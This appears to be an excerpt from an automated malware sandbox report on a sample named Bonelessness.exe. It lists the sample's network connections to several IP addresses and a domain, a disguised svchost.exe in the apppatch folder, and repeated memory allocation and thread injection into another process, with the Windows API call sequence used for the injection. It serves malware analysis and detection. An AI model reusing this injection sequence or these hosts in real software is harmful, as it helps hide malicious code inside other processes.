Source: C:\Windows\apppatch\svchost.exe	Network Connect: 91.195.240.19 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 162.255.119.102 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 188.114.97.3 443	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 44.221.84.105 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 154.212.231.82 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 188.114.96.3 443	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 85.17.31.122 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 69.162.80.58 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Domain query: gacyzuh.com

Allocates memory in foreign processes

Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E40000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D50000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1280000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 9A0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2E40000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2D80000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C20000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B90000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1020000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2340000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3010000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 850000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2960000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2650000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E40000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: A40000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B00000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2880000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2C70000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2DD0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BA0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1320000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: BA0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2F40000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BA0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D50000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2CB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2FB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2340000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 24E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: FF0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2550000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2490000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2920000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1330000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 950000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: E40000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2AF0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C10000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 6B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BF0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2820000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D50000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F40000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2730000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D70000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1050000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2910000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: EE0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: B70000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 3030000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2860000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2D90000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 800000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: C00000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2B70000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 9D0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2250000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2BA0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: FB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2550000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F40000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: F40000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 7E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DA0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1460000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 2900000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 23E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: DB0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: D20000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe base: 1560000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Windows\apppatch\svchost.exe base: 31E0000 protect: page execute and read and write	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Memory allocated: C:\Windows\apppatch\svchost.exe base: 31E0000 protect: page execute and read and write	Jump to behavior

Contains functionality to inject threads in other processes

Source: C:\Users\user\Desktop\Bonelessness.exe	Code function: 0_2_00401B70 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,	0_2_00401B70
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_00401B70 IsUserAnAdmin,Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,WriteProcessMemory,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,	1_2_00401B70
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D448D0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,	1_2_02D448D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_028B48D0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,	5_2_028B48D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_024648D0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,	6_2_024648D0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_013048D0 Sleep,Sleep,OpenProcess,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,VirtualAlloc,memcpy,WriteProcessMemory,VirtualFree,FlushInstructionCache,CreateRemoteThread,GetHandleInformation,CloseHandle,RtlCreateUserThread,GetHandleInformation,CloseHandle,	8_2_013048D0

Creates a thread in another existing process (thread injection)

Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: E41360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: D51360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: 1281360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: 9A1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: 2E41360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: 2D81360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: C21360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: B91360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: 1021360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: 2341360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: 3011360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: 851360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: 2961360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: 2E91360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: 2651360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe EIP: E41360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: A41360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: B01360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2881360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2C71360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2DD1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: BA1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 1321360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: BA1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2F41360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2BA1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: D51360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2CB1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2FB1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2341360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 24E1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: FF1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: DB1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2551360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2491360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2921360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 1331360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 951360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: E41360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2AF1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: C11360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 6B1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2BF1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2821360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: D51360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: F41360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2731360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: D71360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 1051360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: 2911360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: EE1360	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Thread created: unknown EIP: B71360	Jump to behavior
